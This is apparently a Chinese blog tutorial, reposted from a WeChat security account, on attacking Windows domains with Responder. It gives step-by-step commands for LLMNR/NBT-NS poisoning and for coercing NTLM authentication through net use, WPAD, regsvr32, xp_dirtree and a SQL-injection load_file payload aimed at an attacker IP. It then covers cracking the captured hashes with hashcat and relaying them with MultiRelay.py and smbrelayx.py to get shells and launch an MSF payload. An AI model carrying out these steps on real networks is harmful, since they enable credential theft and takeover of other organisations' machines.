Part(一):
一、Responder简介:
①Responder工具可以污染LLMNR和NBT-NS请求,当网络上的机器尝试用LLMNR和NBT-NS去请求目的机器时,Responder会伪装成目的地机器。当受害机器尝试登陆攻击者机器,responder就可以获取受害者机器用户的NTLMv2哈希值。但是,Responder通常抓取的只是Net-NtlmHash,无法用来hash传递,所以要使用例如hashcat等工具破解出明文密码再利用。
②在实际渗透中,如果我们没有获得目标的任何有用信息和重要凭证,就可以利用Responder进行监听抓取凭证,并且Responder是不会主动响应任何请求,只会对流量进行分析。
二、利用Resonder抓取hash:
1.首先在攻击者vps上开启Responder的监听
python Responder.py -I eth0 -v
2.然后在受害机器上执行net use尝试与攻击机建立连接
①通过SMB服务
目标机器执行:
net use \192.168.1.2
可以看到,Responder成功抓取到hash
②通过WPAD代理服务器
vps执行时带上-F参数:
python Responder.py -I eth0 -v -F等待目标机器使用IE浏览网站,即可抓取到Net-NTLM hash
可以看到,Responder成功抓取到hash
lregsvr32配合responder抓ntlm hash:
regsvr32 /s /u /i://192.168.136.144/@OsandaMalith scrobj.dll
lxp_dirtree配合responder抓ntlm hash:
exec xpdirtree '\your-ipxxx'
抓取结果:
lsql注入loadfile()配合responder抓ntlm hash:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,load_file('\\192.168.136.144\xxxx'),3--+
抓取结果:
三、利用hashcat进行破解
hashcat -m 5600 Net-NtlmHash值 密码字典文件路径 --force
可以看到成功被破解出明文:panda123
四、NTLM中继攻击
1.对responder.conf文件进行修改,将SMB和HTTP的值改为off,这样responder就不会获取哈希值,而是交给中继脚本完成。
脚本工作原理:会通过抓取高权限的hash,然后转发给低权限机器,如果认证成功则进而执行命令,获取权限
2.VPS重新开启Responder监听:
①利用HTTP协议进行中继攻击:
python Responder.py -I eth0 -v -F
②利用SMB协议进行中继攻击:
python Responder.py -I eth0 -v
3.利用Responder工具中tools目录下的RunFinger.py识别SMB signing
python RunFinger.py -i 192.168.1.0/24
因为只有SMB signing为false的可以进行中继攻击
4.MultiRelay.py进行中继攻击
VPS另一终端执行:
python MultiRelay.py -t 域内机器ip -u ALL
①然后只要域控机器或者高权限机器利用浏览器上网,就能拿到域内目标主机的shell
②然后只要域控机器或者高权限机器发出任何SMB协议的请求,就能拿到域内目标主机的shell
然后就可以执行脚本自带的命令,例如:
Part(二):
一、利用impacket工具集中的脚本进行中继攻击:
1、smbrelayx.py
工作原理:在VPS伪造一个恶意的SMB服务器,当内网中有机器访问这个SMB服务器时, smbrelayx.py 会抓到 的A主机的 hash ,然后用抓取到的的hash重放给B主机 ,重放成功则会导出B主机本地的用户和 hash
①还是修改Responder.conf,然后开启监听:
python Responder.py -I eth0 -v
②smbrelayx.py开启伪造SMB服务器
smbrelayx.py -h 192.168.1.20 -e ./shell.exe #-h 目标ip,-e指定一个文件
当域控上请求了我们伪造的SMB服务,就会执行指定的msf马
可以看到MSF成功上线,为了保险起见,尽快迁移进程
2、ntlmrelayx.py待更新。。。
python ntlmrelayx.py -t 目标ip
点个赞和在看吧,欢迎转发!
本文始发于微信公众号(哈拉少安全小队):【域渗透】 多种方式配合Responder&NTLM中继攻击
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论